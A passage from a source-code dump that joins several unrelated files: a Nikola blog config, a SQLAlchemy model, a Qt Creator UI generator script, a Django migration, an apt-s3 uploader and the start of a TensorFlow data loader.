# output / TRANSLATION[lang] / ARCHIVE_PATH / ARCHIVE_FILENAME
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / index.html
# output / TRANSLATION[lang] / ARCHIVE_PATH / YEAR / MONTH / index.html
# ARCHIVE_PATH = ""
# ARCHIVE_FILENAME = "archive.html"
# Final locations are:
# output / TRANSLATION[lang] / RSS_PATH / rss.xml
# RSS_PATH = ""
# Number of posts in RSS feeds
FEED_LENGTH = 10
# Slug the Tag URL easier for users to type, special characters are
# often removed or replaced as well.
# SLUG_TAG_PATH = True
# A list of redirection tuples, [("foo/from.html", "/bar/to.html")].
#
# A HTML file will be created in output/foo/from.html that redirects
# to the "/bar/to.html" URL. notice that the "from" side MUST be a
# relative URL.
#
# If you don't need any of these, just set to []
# REDIRECTIONS = []
# Commands to execute to deploy. Can be anything, for example,
# you may use rsync:
# And then do a backup, or ping pingomatic.
# To do manual deployment, set it to []
DEPLOY_COMMANDS = ['lftp -e "mirror --delete-first -R output/ .;exit" [email protected]/wibfi',
'echo Save ...',
'cd .. ; tar cvjf _save-wibfi_.tgz wibfi/ ; lftp -e "put _save-wibfi_.tgz;exit" [email protected]/wibfi/backup; cd wibfi']
# Where the output site should be located
# If you don't use an absolute path, it will be considered as relative
# to the location of conf.py
# OUTPUT_FOLDER = 'output'
# where the "cache" of partial generated content should be located
# default: 'cache'
# CACHE_FOLDER = 'cache'
# Filters to apply to the output.
# A directory where the keys are either: a file extensions, or
# a tuple of file extensions.
#
# And the value is a list of commands to be applied in order.
#
# Each command must be either:
#
# A string containing a '%s' which will
# be replaced with a filename. The command *must* produce output
# in place.
#
# Or:
#
# A python callable, which will be called with the filename as
# argument.
#
# By default, there are no filters.
# FILTERS = {
# ".jpg": ["jpegoptim --strip-all -m75 -v %s"],
# }
# Create a gzipped copy of each generated file. Cheap server-side optimization.
GZIP_FILES = True
# File extensions that will be compressed
GZIP_EXTENSIONS = ('.txt','.rst', '.htm', '.html', '.css', '.js', '.json')
# #############################################################################
# Image Gallery Options
# #############################################################################
# Galleries are folders in galleries/
# Final location of galleries will be output / GALLERY_PATH / gallery_name
# GALLERY_PATH = "galleries"
# THUMBNAIL_SIZE = 180
# MAX_IMAGE_SIZE = 1280
# USE_FILENAME_AS_TITLE = True
# #############################################################################
# HTML fragments and diverse things that are used by the templates
# #############################################################################
# Data about post-per-page indexes
# INDEXES_TITLE = "" # If this is empty, the default is BLOG_TITLE
# INDEXES_PAGES = "" # If this is empty, the default is 'old posts page %d'
# translated
# Name of the theme to use.
THEME = "w2"
# Color scheme to be used for code blocks. If your theme provides
# "assets/css/code.css" this is ignored.
# Can be any of autumn borland bw colorful default emacs friendly fruity manni
# monokai murphy native pastie perldoc rrt tango trac vim vs
CODE_COLOR_SCHEME = 'borland'
# If you use 'site-reveal' theme you can select several subthemes
# THEME_REVEAL_CONFIG_SUBTHEME = 'sky'
# You can also use: beige/serif/simple/night/default
# Again, if you use 'site-reveal' theme you can select several transitions
# between the slides
# THEME_REVEAL_CONFIG_TRANSITION = 'cube'
# You can also use: page/concave/linear/none/default
# date format used to display post dates.
# (str used by datetime.datetime.strftime)
# DATE_FORMAT = '%Y-%m-%d %H:%M'
# FAVICONS contains (name, file, size) tuples.
# Used for create favicon link like this:
# <link rel="name" href="file" sizes="size"/>
# For creating favicons, take a look at:
# http://www.netmagazine.com/features/create-perfect-favicon
FAVICONS = {
("icon", "/favicon.ico", "16x16"),
("icon", "/favicon.png", "64x64"),
}
# Show only teasers in the index pages? Defaults to False.
INDEX_TEASERS = True
# A HTML fragment with the Read more... link.
# The following tags exist and are replaced for you:
# {link} A link to the full post page.
# {read_more} The string “Read more” in the current language.
# {{ A literal { (U+007B LEFT CURLY BRACKET)
# }} A literal } (U+007D RIGHT CURLY BRACKET)
READ_MORE_LINK = '<p class="more"><a href="{link}">{read_more}…</a></p>'
# A HTML fragment describing the license, for the sidebar.
LICENSE = '<a rel="license" href="http://creativecommons.org/licenses/by-sa/3.0/fr/"><img title="TL;DR" alt="Licence Creative Commons" style="border-width:0" src="http://i.creativecommons.org/l/by-sa/3.0/fr/88x31.png" /></a>'
# I recommend using the Creative Commons' wizard:
# http://creativecommons.org/choose/
# LICENSE = """
# <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/2.5/ar/">
# <img alt="Creative Commons License BY-NC-SA"
# style="border-width:0; margin-bottom:12px;"
# src="http://i.creativecommons.org/l/by-nc-sa/2.5/ar/88x31.png"></a>"""
# A small copyright notice for the page footer (in HTML).
# Default is ''
XITI = """<a href="http://www.xiti.com/xiti.asp?s=538203" title="WebAnalytics" target="_top">
<script type="text/javascript">
<!--
Xt_param = 's=538203&p=index';
try {Xt_r = top.document.referrer;}
catch(e) {Xt_r = document.referrer; }
Xt_h = new Date();
Xt_i = '<img width="80" height="15" border="0" alt="" ';
Xt_i += 'src="http://logv4.xiti.com/g.xiti?'+Xt_param;
Xt_i += '&hl='+Xt_h.getHours()+'x'+Xt_h.getMinutes()+'x'+Xt_h.getSeconds();
if(parseFloat(navigator.appVersion)>=4)
{Xt_s=screen;Xt_i+='&r='+Xt_s.width+'x'+Xt_s.height+'x'+Xt_s.pixelDepth+'x'+Xt_s.colorDepth;}
document.write(Xt_i+'&ref='+Xt_r.replace(/[<>"]/g, '').replace(/&/g, '$')+'" title="Internet Audience">');
//-->
</script>
<noscript>
<img width="80" height="15" src="http://logv4.xiti.com/g.xiti?s=538203&p=index" alt="WebAnalytics" />
</noscript></a>"""
CONTENT_FOOTER = '2013 - {date} <a href="mailto:{email}">{author}</a> mais c\'est <a href="http://getnikola.com">Nikola</a> qui propulse. {license} - {xiti}'
CONTENT_FOOTER = CONTENT_FOOTER.format(email=BLOG_EMAIL,
author=BLOG_AUTHOR,
date=time.gmtime().tm_year,
license=LICENSE, xiti=XITI)
# To use comments, you can choose between different third party comment
# systems, one of "disqus", "livefyre", "intensedebate", "moot",
# "googleplus" or "facebook"
COMMENT_SYSTEM = "disqus"
# And you also need to add your COMMENT_SYSTEM_ID which
# depends on what comment system you use. The default is
# "nikolademo" which is a test account for Disqus. More information
# is in the manual.
COMMENT_SYSTEM_ID = "wibfi"
# Create index.html for story folders?
# STORY_INDEX = False
# Enable comments on story pages?
# COMMENTS_IN_STORIES = False
# Enable comments on picture gallery pages?
# COMMENTS_IN_GALLERIES = False
# What file should be used for directory indexes?
# Defaults to index.html
# Common other alternatives: default.html for IIS, index.php
# INDEX_FILE = "index.html"
# If a link ends in /index.html, drop the index.html part.
# http://mysite/foo/bar/index.html => http://mysite/foo/bar/
# (Uses the INDEX_FILE setting, so if that is, say, default.html,
# it will instead /foo/default.html => /foo)
# (Note: This was briefly STRIP_INDEX_HTML in v 5.4.3 and 5.4.4)
# Default = False
# STRIP_INDEXES = False
# Should the sitemap list directories which only include other directories
# and no files.
# Default to True
# If this is False
# e.g. /2012 includes only /01, /02, /03, /04, ...: don't add it to the sitemap
# if /2012 includes any files (including index.html)... add it to the sitemap
# SITEMAP_INCLUDE_FILELESS_DIRS = True
# Instead of putting files in <slug>.html, put them in
# <slug>/index.html. Also enables STRIP_INDEXES
# This can be disabled on a per-page/post basis by adding
# .. pretty_url: False
# to the metadata
# PRETTY_URLS = False
# If True, publish future dated posts right away instead of scheduling them.
# Defaults to False.
# FUTURE_IS_NOW = False
# If True, future dated posts are allowed in deployed output
# Only the individual posts are published/deployed; not in indexes/sitemap
# Generally, you want FUTURE_IS_NOW and DEPLOY_FUTURE to be the same value.
# DEPLOY_FUTURE = False
# If False, draft posts will not be deployed
# DEPLOY_DRAFTS = True
# Allows scheduling of posts using the rule specified here (new_post -s)
# Specify an iCal Recurrence Rule: http://www.kanzaki.com/docs/ical/rrule.html
#SCHEDULE_RULE = 'RRULE:FREQ=DAILY;BYHOUR=12;BYMINUTE=0;BYSECOND=0'
# If True, use the scheduling rule to all posts by default
SCHEDULE_ALL = False
# If True, schedules post to today if possible, even if scheduled hour is over
# SCHEDULE_FORCE_TODAY = False
# Do you want a add a Mathjax config file?
# MATHJAX_CONFIG = ""
# If you are using the compile-ipynb plugin, just add this one:
#MATHJAX_CONFIG = """
#<script type="text/x-mathjax-config">
#MathJax.Hub.Config({
# tex2jax: {
# inlineMath: [ ['$','$'], ["\\\(","\\\)"] ],
# displayMath: [ ['$$','$$'], ["\\\[","\\\]"] ]
# },
# displayAlign: 'left', // Change this to 'center' to center equations.
# "HTML-CSS": {
# styles: {'.MathJax_Display': {"margin": 0}}
# }
#});
#</script>
#"""
# What MarkDown extensions to enable?
# You will also get gist, nikola and podcast because those are
# done in the code, hope you don't mind ;-)
# MARKDOWN_EXTENSIONS = ['fenced_code', 'codehilite']
# Social buttons. This is sample code for AddThis (which was the default for a
# long time). Insert anything you want here, or even make it empty.
SOCIAL_BUTTONS_CODE = ""
# <!-- Social buttons -->
# <div id="addthisbox" class="addthis_toolbox addthis_peekaboo_style addthis_default_style addthis_label_style addthis_32x32_style">
# <a class="addthis_button_more">Share</a>
# <ul><li><a class="addthis_button_facebook"></a>
# <li><a class="addthis_button_google_plusone_share"></a>
# <li><a class="addthis_button_linkedin"></a>
# <li><a class="addthis_button_twitter"></a>
# </ul>
# </div>
# <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4f7088a56bb93798"></script>
# <!-- End of social buttons -->
#"""
# Hide link to source for the posts?
HIDE_SOURCELINK = True
# Copy the source files for your pages?
# Setting it to False implies HIDE_SOURCELINK = True
COPY_SOURCES = False
# Modify the number of Post per Index Page
# Defaults to 10
INDEX_DISPLAY_POST_COUNT = 10
# RSS_LINK is a HTML fragment to link the RSS or Atom feeds. If set to None,
# the base.tmpl will use the feed Nikola generates. However, you may want to
# change it for a feedburner feed or something else.
# RSS_LINK = None
# Show only teasers in the RSS feed? Default to True
RSS_TEASERS = True
# A search form to search this site, for the sidebar. You can use a google
# custom search (http://www.google.com/cse/)
# Or a duckduckgo search: https://duckduckgo.com/search_box.html
# Default is no search form.
# SEARCH_FORM = ""
#
# This search form works for any site and looks good in the "site" theme where
# it appears on the navigation bar:
#
SEARCH_FORM = """
<!-- Custom search -->
<form method="get" id="search" action="http://duckduckgo.com/"
class="navbar-form pull-left">
<input type="hidden" name="sites" value="%s"/>
<input type="hidden" name="k8" value="#444444"/>
<input type="hidden" name="k9" value="#D51920"/>
<input type="hidden" name="kt" value="h"/>
<input type="text" name="q" maxlength="255" placeholder="DuckDuckGo…" class="span2 form-control input-sm" style="width:65%%; padding:0; height:2em;"/>
<input type="submit" value="DuckDuckGo Search" style="visibility: hidden; width: 5%%" />
</form>
<!-- End of custom search -->
""" % SITE_URL
#
# If you prefer a google search form, here's an example that should just work:
#SEARCH_FORM = """
#<!-- Custom search with google-->
#<form id="search" action="http://google.com/search" method="get" class="navbar-form pull-left">
#<input type="hidden" name="q" value="site:%s" />
#<input type="text" name="q" maxlength="255" results="0" placeholder="Search"/>
#</form>
#<!-- End of custom search -->
#""" % SITE_URL
# Also, there is a local search plugin you can use, based on Tipue, but it requires setting several
# options:
# SEARCH_FORM = """
# <span class="navbar-form pull-left">
# <input type="text" id="tipue_search_input">
# </span>"""
#
# BODY_END = """
# <script type="text/javascript" src="/assets/js/tipuesearch_set.js"></script>
# <script type="text/javascript" src="/assets/js/tipuesearch.js"></script>
# <script type="text/javascript">
# $(document).ready(function() {
# $('#tipue_search_input').tipuesearch({
# 'mode': 'json',
# 'contentLocation': '/assets/js/tipuesearch_content.json',
# 'showUrl': false
# });
# });
# </script>
# """
EXTRA_HEAD_DATA = """
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-44317802-1']);
_gaq.push(['_setDomainName', 'virtua-peanuts.net']);
_gaq.push(['_trackPageview']);
(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>"""
# <link rel="stylesheet" type="text/css" href="/assets/css/tipuesearch.css">
# <div id="tipue_search_content" style="margin-left: auto; margin-right: auto; padding: 20px;"></div>
# ENABLED_EXTRAS = ['local_search']
#
# Use content distribution networks for jquery and twitter-bootstrap css and js
# If this is True, jquery is served from the Google CDN and twitter-bootstrap
# is served from the NetDNA CDN
# Set this to False if you want to host your site without requiring access to
# external resources.
# USE_CDN = False
# Extra things you want in the pages HEAD tag. This will be added right
# before </HEAD>
# EXTRA_HEAD_DATA = ""
# Google analytics or whatever else you use. Added to the bottom of <body>
# in the default template (base.tmpl).
# BODY_END = ""
# The possibility to extract metadata from the filename by using a
# regular expression.
# To make it work you need to name parts of your regular expression.
# The following names will be used to extract metadata:
# - title
# - slug
# - date
# - tags
# - link
# - description
#
# An example re is the following:
# '(?P<date>\d{4}-\d{2}-\d{2})-(?P<slug>.*)-(?P<title>.*)\.md'
# FILE_METADATA_REGEXP = None
# Additional metadata that is added to a post when creating a new_post
ADDITIONAL_METADATA = {}
# Nikola supports Twitter Card summaries / Open Graph.
# Twitter cards make it possible for you to attach media to Tweets
# that link to your content.
#
# IMPORTANT:
# Please note, that you need to opt-in for using Twitter Cards!
# To do this please visit
# https://dev.twitter.com/form/participate-twitter-cards
#
# Uncomment and modify to following lines to match your accounts.
# Specifying the id for either 'site' or 'creator' will be preferred
# over the cleartext username. Specifying an ID is not necessary.
# Displaying images is currently not supported.
# TWITTER_CARD = {
# # 'use_twitter_cards': True, # enable Twitter Cards / Open Graph
# # 'site': '@website', # twitter nick for the website
# # 'site:id': 123456, # Same as site, but the website's Twitter user ID
# # instead.
# # 'creator': '@username', # Username for the content creator / author.
# # 'creator:id': 654321, # Same as creator, but the Twitter user's ID.
# }
# If you want to use formatted post time in W3C-DTF Format
# (ex. 2012-03-30T23:00:00+02:00),
# set timzone if you want a localized posted date.
#
TIMEZONE = 'Europe/Paris'
# If webassets is installed, bundle JS and CSS to make site loading faster
# USE_BUNDLES = True
# Plugins you don't want to use. Be careful :-)
# DISABLED_PLUGINS = ["render_galleries"]
# Experimental plugins - use at your own risk.
# They probably need some manual adjustments - please see their respective
# readme.
ENABLED_EXTRAS = [
# 'planetoid',
# 'ipynb',
# 'local_search',
# 'render_mustache',
]
# List of regular expressions, links matching them will always be considered
# valid by "nikola check -l"
# LINK_CHECK_WHITELIST = []
# If set to True, enable optional hyphenation in your posts (requires pyphen)
# HYPHENATE = False
# Put in global_context things you want available on all your templates.
# It can be anything, data, functions, modules, etc.
GLOBAL_CONTEXT = {}
| gpl-3.0 | -2,642,146,339,466,596,400 | 34.269051 | 225 | 0.670915 | false |
xuanthuong/golfgame | models/work_history.py | 1 | 2217 | # -*- coding: utf-8 -*-
# Description: work_history table
# By Thuong.Tran
# Date: 29 Aug 2017
from sqlalchemy import create_engine, Table, Column, MetaData, Integer, Text, DateTime, Float
from sqlalchemy import select, and_
import datetime as dt
class work_history():
def __init__(self, db_url):
_engine = create_engine(db_url)
_connection = _engine.connect()
_metadata = MetaData()
_work_history = Table("work_history", _metadata,
Column("WRK_HIS_ID", Integer, primary_key=True),
Column("USR_ID", Integer),
Column("PROC_NM", Text),
Column("ST_DT", DateTime),
Column("END_DT", DateTime),
Column("LD_TM", Float),
Column("CRE_DT", DateTime))
_metadata.create_all(_engine)
self.connection = _connection
self.work_history = _work_history
pass
def insert_to(self, data):
is_valid = True
# for item in data:
# if not item:
# is_valid = False
# raise DropItem("Missing %s!" % item)
if is_valid:
ins_query = self.work_history.insert().values(data)
self.connection.execute(ins_query)
def get_all(self):
s = select([self.work_history]).order_by('PROC_NM')
result = self.connection.execute(s)
return result
def get_by_period(self, start_date, end_date):
s = select([self.work_history]).where(and_(self.work_history.c.ST_DT >= start_date,
self.work_history.c.END_DT <= end_date))
result = self.connection.execute(s)
return result
def get_finalized_process_of_one_day(self, today, worker):
lower = dt.datetime(today.year, today.month, today.day, 0, 0, 0)
upper = dt.datetime(today.year, today.month, today.day, 23, 59, 59)
print(lower)
print(upper)
s = select([self.work_history]).where(and_(self.work_history.c.END_DT > lower,
self.work_history.c.END_DT < upper,
self.work_history.c.USR_ID == worker))
result = self.connection.execute(s)
return result
| mit | 6,242,151,486,691,357,000 | 35.95 | 93 | 0.564727 | false |
qtproject/qt-creator | scripts/generateClangFormatChecksUI.py | 3 | 9025 | #!/usr/bin/env python
############################################################################
#
# Copyright (C) 2019 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import argparse
import json
import os
import docutils.nodes
import docutils.parsers.rst
import docutils.utils
def full_ui_content(checks):
return '''<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>ClangFormat::ClangFormatChecksWidget</class>
<widget class="QWidget" name="ClangFormat::ClangFormatChecksWidget">
<property name="maximumSize">
<size>
<width>480</width>
<height>16777215</height>
</size>
</property>
<layout class="QGridLayout" name="checksLayout">
''' + checks + ''' </layout>
</widget>
<resources/>
<connections/>
</ui>
'''
def parse_arguments():
parser = argparse.ArgumentParser(description='Clazy checks header file generator')
parser.add_argument('--clang-format-options-rst', help='path to ClangFormatStyleOptions.rst',
default=None, dest='options_rst')
return parser.parse_args()
def parse_rst(text):
parser = docutils.parsers.rst.Parser()
components = (docutils.parsers.rst.Parser,)
settings = docutils.frontend.OptionParser(components=components).get_default_values()
document = docutils.utils.new_document('<rst-doc>', settings=settings)
parser.parse(text, document)
return document
def createItem(key, value, index):
label = ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + key + '''">
<property name="text">
<string notr="true">''' + key + '''</string>
</property>
</widget>
</item>
'''
value_item = ''
if value[0] == 'bool':
value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
elif value[0].startswith('std::string') or value[0] == 'unsigned' or value[0] == 'int':
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QLineEdit" name="''' + key + '''">
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
elif value[0].startswith('std::vector'):
value_item = ''' <item row="''' + str(index) + '''" column="1">
<layout class="QHBoxLayout">
<item>
<widget class="QPlainTextEdit" name="''' + key + '''">
<property name="sizePolicy">
<sizepolicy hsizetype="Expanding" vsizetype="Fixed"/>
</property>
<property name="maximumSize">
<size>
<width>16777215</width>
<height>50</height>
</size>
</property>
</widget>
</item>
<item>
<widget class="QPushButton" name="set''' + key + '''">
<property name="maximumSize">
<size>
<width>40</width>
<height>16777215</height>
</size>
</property>
<property name="text">
<string notr="true">Set</string>
</property>
</widget>
</item>
</layout>
</item>
'''
else:
if ' ' in value[1]:
value_item = ''
for i, val in enumerate(value):
if i == 0:
continue
index += 1
space_index = val.find(' ')
val = val[space_index + 1:]
value_item += ''' <item row="''' + str(index) + '''" column="0">
<widget class="QLabel" name="label''' + val + '''">
<property name="text">
<string notr="true"> ''' + val + '''</string>
</property>
</widget>
</item>
'''
value_item += ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + val + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
<item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">true</string>
</property>
</item>
<item>
<property name="text">
<string notr="true">false</string>
</property>
</item>
</widget>
</item>
'''
else:
value_item = ''' <item row="''' + str(index) + '''" column="1">
<widget class="QComboBox" name="''' + key + '''">
<property name="focusPolicy">
<enum>Qt::StrongFocus</enum>
</property>
'''
if key == 'Language':
value_item += ''' <property name="enabled">
<bool>false</bool>
</property>
'''
if index > 0:
value_item += ''' <item>
<property name="text">
<string notr="true">Default</string>
</property>
</item>
'''
for i, val in enumerate(value):
if i == 0:
continue
underline_index = val.find('_')
val = val[underline_index + 1:]
value_item += ''' <item>
<property name="text">
<string notr="true">''' + val + '''</string>
</property>
</item>
'''
value_item += ''' </widget>
</item>
'''
return label + value_item, index
class MyVisitor(docutils.nodes.NodeVisitor):
in_bullet_list = False
in_bullet_list_paragraph = False
tree = {}
last_key = ''
def visit_term(self, node):
node_values = node.traverse(condition=docutils.nodes.Text)
name = node_values[0].astext()
self.last_key = name
self.tree[name] = [node_values[2].astext()]
def visit_bullet_list(self, node):
self.in_bullet_list = True
def depart_bullet_list(self, node):
self.in_bullet_list = False
def visit_paragraph(self, node):
if self.in_bullet_list:
self.in_bullet_list_paragraph = True
def depart_paragraph(self, node):
self.in_bullet_list_paragraph = False
def visit_literal(self, node):
if self.in_bullet_list_paragraph:
value = node.traverse(condition=docutils.nodes.Text)[0].astext()
self.tree[self.last_key].append(value)
self.in_bullet_list_paragraph = False
def unknown_visit(self, node):
"""Called for all other node types."""
#print(node)
pass
def unknown_departure(self, node):
pass
def main():
arguments = parse_arguments()
content = file(arguments.options_rst).read()
document = parse_rst(content)
visitor = MyVisitor(document)
document.walkabout(visitor)
keys = visitor.tree.keys()
basedOnStyleKey = 'BasedOnStyle'
keys.remove(basedOnStyleKey)
keys.sort()
text = ''
line, index = createItem(basedOnStyleKey, visitor.tree[basedOnStyleKey], 0)
text += line
index = 1
for key in keys:
line, index = createItem(key, visitor.tree[key], index)
text += line
index += 1
current_path = os.path.dirname(os.path.abspath(__file__))
ui_path = os.path.abspath(os.path.join(current_path, '..', 'src',
'plugins', 'clangformat', 'clangformatchecks.ui'))
with open(ui_path, 'w') as f:
f.write(full_ui_content(text))
if __name__ == "__main__":
main()
| gpl-3.0 | -6,718,310,938,669,209,000 | 30.013746 | 97 | 0.560665 | false |
Ircam-Web/mezzanine-organization | organization/agenda/migrations/0033_dynamicmultimediaevent.py | 1 | 1459 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-11-30 10:33
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import mezzanine.core.fields
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('mezzanine_agenda', '0028_auto_20180926_1235'),
('organization-agenda', '0032_auto_20181108_1636'),
]
operations = [
migrations.CreateModel(
name='DynamicMultimediaEvent',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('_order', mezzanine.core.fields.OrderField(null=True, verbose_name='Order')),
('object_id', models.PositiveIntegerField(editable=False, null=True, verbose_name='related object')),
('content_type', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType', verbose_name='content type')),
('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='dynamic_multimedia', to='mezzanine_agenda.Event', verbose_name='event')),
],
options={
'verbose_name': 'Multimedia',
'ordering': ('_order',),
},
),
]
| agpl-3.0 | 7,624,932,403,393,662,000 | 43.212121 | 199 | 0.626456 | false |
JamieCressey/apt-s3 | apts3/__init__.py | 1 | 6562 | # Copyright 2016 Jamie Cressey
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
import boto3
import botocore.exceptions
import logging
import sys
import json
import pwd
import os
import apt.resources
from datetime import datetime, timedelta
from time import sleep
__author__ = 'Jamie Cressey'
__version__ = '0.9.0'
class AptS3(object):
def __init__(self, args):
self.log = self._logger()
self.args = args
self.debs = args.files.split()
if args.action == 'upload':
self.upload_debs()
elif args.action == 'delete':
self.delete_debs()
else:
self.log.error('Unknown command: {}'.format(args.action))
def _logger(self):
log = logging.getLogger('apt-s3')
log.setLevel(logging.INFO)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter(
'%(asctime)s %(levelname)-8s %(name)s: %(message)s',
'%Y-%m-%d %H:%M:%S'))
log.addHandler(handler)
return log
def _s3_conn(self):
boto3.setup_default_session(
profile_name=self.args.profile,
region_name=self.args.region)
self.s3 = boto3.client('s3')
def _check_debs_exist(self, deb):
if not os.path.isfile(deb):
self.log.error('File {0} doesn\'t exist'.format(deb))
exit(1)
def _check_lock(self, arch):
if self.args.lock:
lockfile = 'dists/{0}/{1}/binary-{2}/apts3_lockfile'.format(
self.args.codename, self.args.component, arch)
ts_now = datetime.utcnow()
ts_stop = ts_now + timedelta(seconds=self.args.lock_timeout)
while ts_now < ts_stop:
try:
lock = self.s3.get_object(
Bucket=self.args.bucket,
Key=lockfile)
lock_body = json.loads(lock['Body'].read())
self.log.info(
"Repository is locked by another user: {0}@{1}".format(
lock_body['user'], lock_body['host']))
ts_now = datetime.utcnow()
ts_lock = lock['LastModified'].replace(tzinfo=None)
ts_diff = ts_now - ts_lock
if ts_diff.seconds > self.args.lock_timeout:
self.log.error(
'Repository lock is too old: {}. Please investigate.'.format(ts_diff))
exit(1)
sleep(10)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'NoSuchKey':
break
else:
raise
self.log.info("Attempting to obtain a lock")
lock_body = json.dumps({
"user": pwd.getpwuid(os.getuid()).pw_name,
"host": os.uname()[1]
})
self.s3.put_object(
Body=lock_body,
Bucket=self.args.bucket,
Key=lockfile)
self.log.info("Locked repository for updates")
def _delete_lock(self, arch):
if self.args.lock:
self.log.info('Removing lockfile')
lockfile = 'dists/{0}/{1}/binary-{2}/apts3_lockfile'.format(
self.args.codename, self.args.component, arch)
self.s3.delete_object(
Bucket=self.args.bucket,
Key=lockfile)
def _parse_manifest(self, arch):
self.manifests[arch] = apt.resources.Manifest(
bucket=self.args.bucket,
codename=self.args.codename,
component=self.args.component,
architecture=arch,
visibility=self.args.visibility,
s3=self.s3)
def _parse_package(self, deb):
self.log.info("Examining package file {}".format(deb))
pkg = apt.resources.Package(deb)
if self.args.arch:
arch = self.args.arch
elif pkg.architecture:
arch = pkg.architecture
else:
self.log.error(
"No architcture given and unable to determine one for {0}. Please specify one with --arch [i386|amd64].".format(deb))
exit(1)
if arch == 'all' and len(self.manifests) == 0:
self.log.error(
'Package {0} had architecture "all" however noexisting package lists exist. This can often happen if the first package you are add to a new repository is an "all" architecture file. Please use --arch [i386|amd64] or another platform type to upload the file.'.format(deb))
exit(1)
if arch not in self.manifests:
self._parse_manifest(arch)
self.manifests[arch].add(pkg)
if arch == 'all':
self.packages_arch_all.append(pkg)
def _update_manifests(self):
for arch, manifest in self.manifests.iteritems():
if arch == 'all':
continue
for pkg in self.packages_arch_all:
manifest.add(pkg)
def _upload_manifests(self):
self.log.info('Uploading packages and new manifests to S3')
for arch, manifest in self.manifests.iteritems():
self._check_lock(arch)
manifest.write_to_s3()
self.release.update_manifest(manifest)
self.log.info('Update complete.')
self._delete_lock(arch)
def upload_debs(self):
if not self.debs:
self.log.error('You must specify at least one file to upload')
exit(1)
map(self._check_debs_exist, self.debs)
self._s3_conn()
self.log.info("Retrieving existing manifests")
self.release = apt.resources.Release(self.args)
self.manifests = {}
map(self._parse_manifest, self.release['architectures'])
self.packages_arch_all = []
map(self._parse_package, self.debs)
| apache-2.0 | -2,980,966,164,605,318,700 | 32.141414 | 287 | 0.556995 | false |
GEMISIS/machine-learning | Kaggle/TensorFlow Speech Recognition Challenge/neural_network.py | 1 | 15527 | import os
import tensorflow as tf
import numpy as np
from data import get_files
from data import FEATURES
from data import OUTPUTS
from data import RESULT_MAP
class DataPoint:
length = 0
filenames = []
xs = []
ys = []
# Our expected inputs for training, testing, etc.
class NNData:
training = DataPoint()
cross_validation = DataPoint()
testing = DataPoint()
everything = DataPoint()
output = DataPoint()
def __init__(self, load_training_data=True, partial=False, split_type="test", cv_percent=0.2, test_percent=0.2):
# Start by reading in our CSV files.
self.everything.xs, self.everything.ys, self.everything.filenames = get_files(partial, training_data=load_training_data)
self.everything.length = len(self.everything.xs)
if split_type == "cv-test":
# Get our training data.
self.training.xs = self.everything.xs[0:int(self.everything.length * (1 - cv_percent - test_percent))]
self.training.ys = self.everything.ys[0:int(self.everything.length * (1 - cv_percent - test_percent))]
self.training.filenames = self.everything.filenames[0:int(self.everything.length * (1 - cv_percent - test_percent))]
self.training.length = int(self.everything.length * (1 - cv_percent - test_percent))
# Get our cross validation data.
self.cross_validation.xs = self.everything.xs[int(self.everything.length * (1 - cv_percent - test_percent)):int(self.everything.length * (1 - test_percent))]
self.cross_validation.ys = self.everything.ys[int(self.everything.length * (1 - cv_percent - test_percent)):int(self.everything.length * (1 - test_percent))]
